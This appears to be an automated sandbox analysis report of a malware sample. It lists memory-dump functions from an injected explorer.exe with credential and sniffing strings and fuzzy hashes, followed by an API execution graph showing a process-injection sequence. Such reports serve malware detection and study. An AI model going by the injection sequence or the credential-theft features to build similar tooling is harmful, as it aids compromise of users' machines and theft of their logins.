                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: UR$2$L: $Pass$User$name$word
                                                      • API String ID: 0-2058692283
                                                      • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                      • Instruction ID: c8706412aa632b538aebdd50a73925a21b73676d7f6e03748b00de257a62c358
                                                      • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                      • Instruction Fuzzy Hash: B0919F716187488FDB29EFA8D444BEEB7E1FF88300F404A2DD48AD7251EF7099468785
                                                      Function 0E04E352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $.$e$n$v
                                                      • API String ID: 0-1849617553
                                                      • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                      • Instruction ID: 0671e5518f95577fc6bee3366cfa9b8dd11de79da1261c9703a7a259a5cc18d9
                                                      • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                      • Instruction Fuzzy Hash: 667172716187488FD758EFA8D4886EAB7F1FF54304F400A3ED44AC7261EB71D9468B85
                                                      Function 0E049C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2.dl$dll$l32.$ole3$shel
                                                      • API String ID: 0-1970020201
                                                      • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                      • Instruction ID: 932db4f4fdc481ccc87bc0015bd87fe5abdce08f9814d4a2d6834f65816defae
                                                      • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                      • Instruction Fuzzy Hash: DC514EB1914B4D8FDB64EFA4C0456EEB7F1FF58300F404A2E999AE7214EF3095418B99
                                                      Function 0E04A86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4$\$dll$ion.$vers
                                                      • API String ID: 0-1610437797
                                                      • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                      • Instruction ID: 4c5e68525aa5ad8aeb403eaaa9e0e817c9423717f5701872e3e543076aaf1e2f
                                                      • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                      • Instruction Fuzzy Hash: 08416F71258B488BCBB9EF6498557EBB3E4FB98301F40462E999EC7240EF30D9458782
                                                      Function 0E04C4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 32.d$cli.$dll$sspi$user
                                                      • API String ID: 0-327345718
                                                      • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                      • Instruction ID: 5489327073478170e5c8c71561902b38919415493901597195c74272792b7a26
                                                      • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                      • Instruction Fuzzy Hash: 5B4181B1A19E0D8FEB98EF5881943EEB3E1FB68300F40456E980AD3210DA71D9808B85
                                                      Function 0E04A432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .dll$el32$h$kern
                                                      • API String ID: 0-4264704552
                                                      • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                      • Instruction ID: 71ff8ac9723103c4b1cfe3848c66fc4c5ab925dacacc9dd455278fa05d9fef5a
                                                      • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                      • Instruction Fuzzy Hash: 4B4181B0608B4C8FD7A9DF2881883AAB7F1FB98341F104A3E959EC3255EB70D945CB41
                                                      Function 0E0510B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $Snif$f fr$om:
                                                      • API String ID: 0-3434893486
                                                      • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                      • Instruction ID: 05ef8505565722457db4f3891757df6025b2247a7ccafffc13403f18d94ebcaf
                                                      • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                      • Instruction Fuzzy Hash: 1B31D332509B885FC72ADB68D4846DBB7D4FB94300F904D1ED89BC7351EE31A94ACB42
                                                      Function 0E0510C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $Snif$f fr$om:
                                                      • API String ID: 0-3434893486
                                                      • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                      • Instruction ID: 10c601c976f885047d9d9f69ecee6ee314b5e73354b42fd8278069a800e9a5a5
                                                      • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                      • Instruction Fuzzy Hash: 6831E072508B486FD729EB28C4846EBB7D4FB94300F804D1EE89BC7351EE30A906CB42
                                                      Function 0E04CFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .dll$chro$hild$me_c
                                                      • API String ID: 0-3136806129
                                                      • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                      • Instruction ID: bfc236a6df0b4b7654b3433d244347e551452f18d91b5c30f78ee398c785e9b2
                                                      • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                      • Instruction Fuzzy Hash: 0E315AB1118A088FCB95EF689494BABB7E1FB98300F844A7D984ACB314DF30D905CB52
                                                      Function 0E04CFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .dll$chro$hild$me_c
                                                      • API String ID: 0-3136806129
                                                      • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                      • Instruction ID: bb4fbb63c5ab834c9df7251fa7b3f774fa16fbb4bbd1ac9d86228ed344bf9c2e
                                                      • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                      • Instruction Fuzzy Hash: D3316AB1118A088FCB94EF689494BABB7E1FB98300F844A3D984ACB354DF30D905CB42
                                                      Function 0E04F8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                      • API String ID: 0-319646191
                                                      • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                      • Instruction ID: eeff5456f5826c3e398a177fef9cee9df6c1ab128c00f30107b075e83ca5a1b8
                                                      • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                      • Instruction Fuzzy Hash: F531FF72610A0C8BCB54EFA8D8887EEB7E1FF58214F40062AD84ED7340DF789A45C789
                                                      Function 0E04F8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                      • API String ID: 0-319646191
                                                      • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                      • Instruction ID: 65a65c3133f628935f4f5ef3efefb69240aac2eda352b2117e955a3549ce2daa
                                                      • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                      • Instruction Fuzzy Hash: CC21D572610A0D8FCB54EFA8D8447EEBBE1FF58204F80462AD85AD7340DF749A45C795
                                                      Function 0E050E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$l$l$t
                                                      • API String ID: 0-168566397
                                                      • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                      • Instruction ID: 3394851b0dd5c650220ad1fb376ddebf2a5da8480ddd7dc6bc2052f12f0212d1
                                                      • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                      • Instruction Fuzzy Hash: FA217C71A24A0D9BDB58EFA8D4447EEBBF0FB18304F904A2DD449D3700DB759991CB84
                                                      Function 0E050E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$l$l$t
                                                      • API String ID: 0-168566397
                                                      • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                      • Instruction ID: e91438fc192313ecd2e8296c8c3c8e5ac89f7cee7761e7dfc304a537c989a2b5
                                                      • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                      • Instruction Fuzzy Hash: BA217C71A24A0D9BDB48EFA8D0447EEBAF0FF18304F904A2ED449D3700DB759991CB84
                                                      Function 0E050FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: auth$logi$pass$user
                                                      • API String ID: 0-2393853802
                                                      • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                      • Instruction ID: 49c43928471b0b7e6786770ad93fb65b0e888cad51b88dabaa5a021eaf6f7a4f
                                                      • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                      • Instruction Fuzzy Hash: 2721AC31624B0D8BCB55DF9998907EEB7F1EF88344F005A59E80AEB344D7B1D9158BC2

                                                      Execution Graph

                                                      Execution Coverage:1.7%
                                                      Dynamic/Decrypted Code Coverage:6.8%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:621
                                                      Total number of Limit Nodes:68
                                                      execution_graph 113763 4a4cb84 113766 4a4a042 113763->113766 113765 4a4cba5 113767 4a4a06b 113766->113767 113768 4a4a182 NtQueryInformationProcess 113767->113768 113783 4a4a56c 113767->113783 113770 4a4a1ba 113768->113770 113769 4a4a1ef 113769->113765 113770->113769 113771 4a4a290 113770->113771 113772 4a4a2db 113770->113772 113795 4a49de2 NtCreateSection NtMapViewOfSection NtClose 113771->113795 113773 4a4a2fc NtSuspendThread 113772->113773 113775 4a4a30d 113773->113775 113777 4a4a331 113773->113777 113775->113765 113776 4a4a2cf 113776->113765 113780 4a4a412 113777->113780 113786 4a49bb2 113777->113786 113779 4a4a531 113782 4a4a552 NtResumeThread 113779->113782 113780->113779 113781 4a4a4a6 NtSetContextThread 113780->113781 113785 4a4a4bd 113781->113785 113782->113783 113783->113765 113784 4a4a51c RtlQueueApcWow64Thread 113784->113779 113785->113779 113785->113784 113787 4a49bf7 113786->113787 113788 4a49c66 NtCreateSection 113787->113788 113789 4a49ca0 113788->113789 113790 4a49d4e 113788->113790 113791 4a49cc1 NtMapViewOfSection 113789->113791 113790->113780 113791->113790 113792 4a49d0c 113791->113792 113792->113790 113793 4a49d88 113792->113793 113794 4a49dc5 NtClose 113793->113794 113794->113780 113795->113776 113796 27cf08d 113799 27cb9d0 113796->113799 113800 27cb9f6 113799->113800 113807 27b9d30 113800->113807 113802 27cba02 113805 27cba26 113802->113805 113815 27b8f30 113802->113815 113853 27ca6b0 113805->113853 113856 27b9c80 113807->113856 113809 27b9d3d 113810 27b9d44 113809->113810 113868 27b9c20 113809->113868 113810->113802 113816 27b8f57 113815->113816 114286 27bb1b0 113816->114286 113818 27b8f69 114290 27baf00 113818->114290 113820 27b8f86 113828 27b8f8d 113820->113828 114361 27bae30 LdrLoadDll 113820->114361 113822 27b90f2 113822->113805 113824 27b8ffc 114306 27bf400 113824->114306 113826 27b9006 113826->113822 113827 27cbf90 2 API calls 113826->113827 113829 27b902a 113827->113829 113828->113822 114294 27bf370 113828->114294 113830 27cbf90 2 API calls 113829->113830 113831 27b903b 113830->113831 113832 27cbf90 2 API calls 113831->113832 113833 27b904c 113832->113833 114318 27bca80 113833->114318 113835 27b9059 113836 27c4a40 8 API calls 113835->113836 113837 27b9066 113836->113837 113838 27c4a40 8 API calls 113837->113838 113839 27b9077 113838->113839 113840 27b90a5 113839->113840 113841 27b9084 113839->113841 113843 27c4a40 8 API calls 113840->113843 114328 27bd610 113841->114328 113848 27b90c1 113843->113848 113846 27b8d00 23 API calls 113846->113822 113847 27b9092 114344 27b8d00 113847->114344 113852 27b90e9 113848->113852 114362 27bd6b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 113848->114362 113852->113846 113854 27caf60 LdrLoadDll 113853->113854 113855 27ca6cf 113854->113855 113887 27c8bc0 113856->113887 113860 27b9ca6 113860->113809 113861 27b9c9c 113861->113860 113894 27cb2b0 113861->113894 113863 27b9ce3 113863->113860 113905 27b9aa0 113863->113905 113865 27b9d03 113911 27b9620 LdrLoadDll 113865->113911 113867 27b9d15 113867->113809 114261 27cb5a0 113868->114261 113871 27cb5a0 LdrLoadDll 113872 27b9c4b 113871->113872 113873 27cb5a0 LdrLoadDll 113872->113873 113874 27b9c61 113873->113874 113875 27bf170 113874->113875 113876 27bf189 113875->113876 114269 27bb030 113876->114269 113878 27bf19c 114273 27ca1e0 113878->114273 113881 27b9d55 113881->113802 113883 27bf1c2 113884 27bf1ed 113883->113884 114279 27ca260 113883->114279 113886 27ca490 2 API calls 113884->113886 113886->113881 113888 27c8bcf 113887->113888 113912 27c4e40 113888->113912 113890 27b9c93 113891 27c8a70 113890->113891 113918 27ca600 113891->113918 113895 27cb2c9 113894->113895 113925 27c4a40 113895->113925 113897 27cb2e1 113898 27cb2ea 113897->113898 113964 27cb0f0 113897->113964 113898->113863 113900 27cb2fe 113900->113898 113982 27c9f00 113900->113982 114239 27b7ea0 113905->114239 113907 27b9ac1 113907->113865 113908 27b9aba 113908->113907 114252 27b8160 113908->114252 113911->113867 113913 27c4e4e 113912->113913 113914 27c4e5a 113912->113914 113913->113914 113917 27c52c0 LdrLoadDll 113913->113917 113914->113890 113916 27c4fac 113916->113890 113917->113916 113921 27caf60 113918->113921 113920 27c8a85 113920->113861 113922 27caf70 113921->113922 113924 27caf92 113921->113924 113923 27c4e40 LdrLoadDll 113922->113923 113923->113924 113924->113920 113926 27c4d75 113925->113926 113927 27c4a54 113925->113927 113926->113897 113927->113926 113990 27c9c50 113927->113990 113930 27c4b80 113993 27ca360 113930->113993 113931 27c4b63 114050 27ca460 LdrLoadDll 113931->114050 113934 27c4ba7 113936 27cbdc0 2 API calls 113934->113936 113935 27c4b6d 113935->113897 113937 27c4bb3 113936->113937 113937->113935 113938 27c4d39 113937->113938 113939 27c4d4f 113937->113939 113944 27c4c42 113937->113944 113940 27ca490 2 API calls 113938->113940 114059 27c4780 LdrLoadDll NtReadFile NtClose 113939->114059 113942 27c4d40 113940->113942 113942->113897 113943 27c4d62 113943->113897 113945 27c4ca9 113944->113945 113947 27c4c51 113944->113947 113945->113938 113946 27c4cbc 113945->113946 114052 27ca2e0 113946->114052 113949 27c4c6a 113947->113949 113950 27c4c56 113947->113950 113953 27c4c6f 113949->113953 113954 27c4c87 113949->113954 114051 27c4640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 113950->114051 113996 27c46e0 113953->113996 113954->113942 114008 27c4400 113954->114008 113956 27c4c60 113956->113897 113959 27c4d1c 114056 27ca490 113959->114056 113960 27c4c7d 113960->113897 113961 27c4c9f 113961->113897 113963 27c4d28 113963->113897 113965 27cb101 113964->113965 113966 27cb113 113965->113966 114077 27cbd40 113965->114077 113966->113900 113968 27cb134 114081 27c4060 113968->114081 113970 27cb180 113970->113900 113971 27cb157 113971->113970 113972 27c4060 3 API calls 113971->113972 113975 27cb179 113972->113975 113974 27cb20a 113976 27cb21a 113974->113976 114207 27caf00 LdrLoadDll 113974->114207 113975->113970 114113 27c5380 113975->114113 114123 27cad70 113976->114123 113979 27cb248 114202 27c9ec0 113979->114202 113983 27caf60 LdrLoadDll 113982->113983 113984 27c9f1c 113983->113984 114233 4bd2c0a 113984->114233 113985 27c9f37 113987 27cbdc0 113985->113987 114236 27ca670 113987->114236 113989 27cb359 113989->113863 113991 27caf60 LdrLoadDll 113990->113991 113992 27c4b34 113991->113992 113992->113930 113992->113931 113992->113935 113994 27caf60 LdrLoadDll 113993->113994 113995 27ca37c NtCreateFile 113994->113995 113995->113934 113997 27c46fc 113996->113997 113998 27ca2e0 LdrLoadDll 113997->113998 113999 27c471d 113998->113999 114000 27c4738 113999->114000 114001 27c4724 113999->114001 114003 27ca490 2 API calls 114000->114003 114002 27ca490 2 API calls 114001->114002 114004 27c472d 114002->114004 114005 27c4741 114003->114005 114004->113960 114060 27cbfd0 LdrLoadDll RtlAllocateHeap 114005->114060 114007 27c474c 114007->113960 114009 27c447e 114008->114009 114010 27c444b 114008->114010 114012 27c45c9 114009->114012 114016 27c449a 114009->114016 114011 27ca2e0 LdrLoadDll 114010->114011 114013 27c4466 114011->114013 114014 27ca2e0 LdrLoadDll 114012->114014 114015 27ca490 2 API calls 114013->114015 114018 27c45e4 114014->114018 114017 27c446f 114015->114017 114019 27ca2e0 LdrLoadDll 114016->114019 114017->113961 114073 27ca320 LdrLoadDll 114018->114073 114020 27c44b5 114019->114020 114022 27c44bc 114020->114022 114023 27c44d1 114020->114023 114025 27ca490 2 API calls 114022->114025 114026 27c44ec 114023->114026 114027 27c44d6 114023->114027 114024 27c461e 114029 27ca490 2 API calls 114024->114029 114030 27c44c5 114025->114030 114035 27c44f1 114026->114035 114061 27cbf90 114026->114061 114028 27ca490 2 API calls 114027->114028 114031 27c44df 114028->114031 114032 27c4629 114029->114032 114030->113961 114031->113961 114032->113961 114043 27c4503 114035->114043 114064 27ca410 114035->114064 114036 27c4557 114037 27c456e 114036->114037 114072 27ca2a0 LdrLoadDll 114036->114072 114039 27c458a 114037->114039 114040 27c4575 114037->114040 114042 27ca490 2 API calls 114039->114042 114041 27ca490 2 API calls 114040->114041 114041->114043 114044 27c4593 114042->114044 114043->113961 114045 27c45bf 114044->114045 114067 27cbb90 114044->114067 114045->113961 114047 27c45aa 114048 27cbdc0 2 API calls 114047->114048 114049 27c45b3 114048->114049 114049->113961 114050->113935 114051->113956 114053 27caf60 LdrLoadDll 114052->114053 114054 27c4d04 114053->114054 114055 27ca320 LdrLoadDll 114054->114055 114055->113959 114057 27caf60 LdrLoadDll 114056->114057 114058 27ca4ac NtClose 114057->114058 114058->113963 114059->113943 114060->114007 114074 27ca630 114061->114074 114063 27cbfa8 114063->114035 114065 27caf60 LdrLoadDll 114064->114065 114066 27ca42c NtReadFile 114065->114066 114066->114036 114068 27cbb9d 114067->114068 114069 27cbbb4 114067->114069 114068->114069 114070 27cbf90 2 API calls 114068->114070 114069->114047 114071 27cbbcb 114070->114071 114071->114047 114072->114037 114073->114024 114075 27caf60 LdrLoadDll 114074->114075 114076 27ca64c RtlAllocateHeap 114075->114076 114076->114063 114078 27cbd65 114077->114078 114208 27ca540 114078->114208 114080 27cbd6d 114080->113968 114082 27c4071 114081->114082 114083 27c4079 114081->114083 114082->113971 114084 27c434c 114083->114084 114211 27ccf30 114083->114211 114084->113971 114086 27c40cd 114087 27ccf30 2 API calls 114086->114087 114091 27c40d8 114087->114091 114088 27c4126 114090 27ccf30 2 API calls 114088->114090 114094 27c413a 114090->114094 114091->114088 114219 27ccfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 114091->114219 114220 27cd060 114091->114220 114093 27c4197 114095 27ccf30 2 API calls 114093->114095 114094->114093 114097 27cd060 3 API calls 114094->114097 114096 27c41ad 114095->114096 114098 27c41ea 114096->114098 114100 27cd060 3 API calls 114096->114100 114097->114094 114099 27ccf30 2 API calls 114098->114099 114101 27c41f5 114099->114101 114100->114096 114102 27cd060 3 API calls 114101->114102 114109 27c422f 114101->114109 114102->114101 114105 27ccf90 2 API calls 114106 27c432e 114105->114106 114107 27ccf90 2 API calls 114106->114107 114108 27c4338 114107->114108 114110 27ccf90 2 API calls 114108->114110 114216 27ccf90 114109->114216 114111 27c4342 114110->114111 114112 27ccf90 2 API calls 114111->114112 114112->114084 114114 27c5391 114113->114114 114115 27c4a40 8 API calls 114114->114115 114117 27c53a7 114115->114117 114116 27c53fa 114116->113974 114117->114116 114118 27c53f5 114117->114118 114119 27c53e2 114117->114119 114121 27cbdc0 2 API calls 114118->114121 114120 27cbdc0 2 API calls 114119->114120 114122 27c53e7 114120->114122 114121->114116 114122->113974 114226 27cac30 114123->114226 114126 27cac30 LdrLoadDll 114127 27cad8d 114126->114127 114128 27cac30 LdrLoadDll 114127->114128 114129 27cad96 114128->114129 114130 27cac30 LdrLoadDll 114129->114130 114131 27cad9f 114130->114131 114132 27cac30 LdrLoadDll 114131->114132 114133 27cada8 114132->114133 114134 27cac30 LdrLoadDll 114133->114134 114135 27cadb1 114134->114135 114136 27cac30 LdrLoadDll 114135->114136 114137 27cadbd 114136->114137 114138 27cac30 LdrLoadDll 114137->114138 114139 27cadc6 114138->114139 114140 27cac30 LdrLoadDll 114139->114140 114141 27cadcf 114140->114141 114142 27cac30 LdrLoadDll 114141->114142 114143 27cadd8 114142->114143 114144 27cac30 LdrLoadDll 114143->114144 114145 27cade1 114144->114145 114146 27cac30 LdrLoadDll 114145->114146 114147 27cadea 114146->114147 114148 27cac30 LdrLoadDll 114147->114148 114149 27cadf6 114148->114149 114150 27cac30 LdrLoadDll 114149->114150 114151 27cadff 114150->114151 114152 27cac30 LdrLoadDll 114151->114152 114153 27cae08 114152->114153 114154 27cac30 LdrLoadDll 114153->114154 114155 27cae11 114154->114155 114156 27cac30 LdrLoadDll 114155->114156 114157 27cae1a 114156->114157 114158 27cac30 LdrLoadDll 114157->114158 114159 27cae23 114158->114159 114160 27cac30 LdrLoadDll 114159->114160 114161 27cae2f 114160->114161 114162 27cac30 LdrLoadDll 114161->114162 114163 27cae38 114162->114163 114164 27cac30 LdrLoadDll 114163->114164 114165 27cae41 114164->114165 114166 27cac30 LdrLoadDll 114165->114166 114167 27cae4a 114166->114167 114168 27cac30 LdrLoadDll 114167->114168 114169 27cae53 114168->114169 114170 27cac30 LdrLoadDll 114169->114170 114171 27cae5c 114170->114171 114172 27cac30 LdrLoadDll 114171->114172 114173 27cae68 114172->114173 114174 27cac30 LdrLoadDll 114173->114174 114175 27cae71 114174->114175 114176 27cac30 LdrLoadDll 114175->114176 114177 27cae7a 114176->114177 114178 27cac30 LdrLoadDll 114177->114178 114179 27cae83 114178->114179 114180 27cac30 LdrLoadDll 114179->114180 114181 27cae8c 114180->114181 114182 27cac30 LdrLoadDll 114181->114182 114183 27cae95 114182->114183 114184 27cac30 LdrLoadDll 114183->114184 114185 27caea1 114184->114185 114186 27cac30 LdrLoadDll 114185->114186 114187 27caeaa 114186->114187 114188 27cac30 LdrLoadDll 114187->114188 114189 27caeb3 114188->114189 114190 27cac30 LdrLoadDll 114189->114190 114191 27caebc 114190->114191 114192 27cac30 LdrLoadDll 114191->114192 114193 27caec5 114192->114193 114194 27cac30 LdrLoadDll 114193->114194 114195 27caece 114194->114195 114196 27cac30 LdrLoadDll 114195->114196 114197 27caeda 114196->114197 114198 27cac30 LdrLoadDll 114197->114198 114199 27caee3 114198->114199 114200 27cac30 LdrLoadDll 114199->114200 114201 27caeec 114200->114201 114201->113979 114203 27caf60 LdrLoadDll 114202->114203 114204 27c9edc 114203->114204 114232 4bd2df0 LdrInitializeThunk 114204->114232 114205 27c9ef3 114205->113900 114207->113976 114209 27caf60 LdrLoadDll 114208->114209 114210 27ca55c NtAllocateVirtualMemory 114209->114210 114210->114080 114212 27ccf46 114211->114212 114213 27ccf40 114211->114213 114214 27cbf90 2 API calls 114212->114214 114213->114086 114215 27ccf6c 114214->114215 114215->114086 114217 27cbdc0 2 API calls 114216->114217 114218 27c4324 114217->114218 114218->114105 114219->114091 114221 27ccfd0 114220->114221 114222 27cd02d 114221->114222 114223 27cbf90 2 API calls 114221->114223 114222->114091 114224 27cd00a 114223->114224 114225 27cbdc0 2 API calls 114224->114225 114225->114222 114227 27cac4b 114226->114227 114228 27c4e40 LdrLoadDll 114227->114228 114229 27cac6b 114228->114229 114230 27c4e40 LdrLoadDll 114229->114230 114231 27cad17 114229->114231 114230->114231 114231->114126 114232->114205 114234 4bd2c1f LdrInitializeThunk 114233->114234 114235 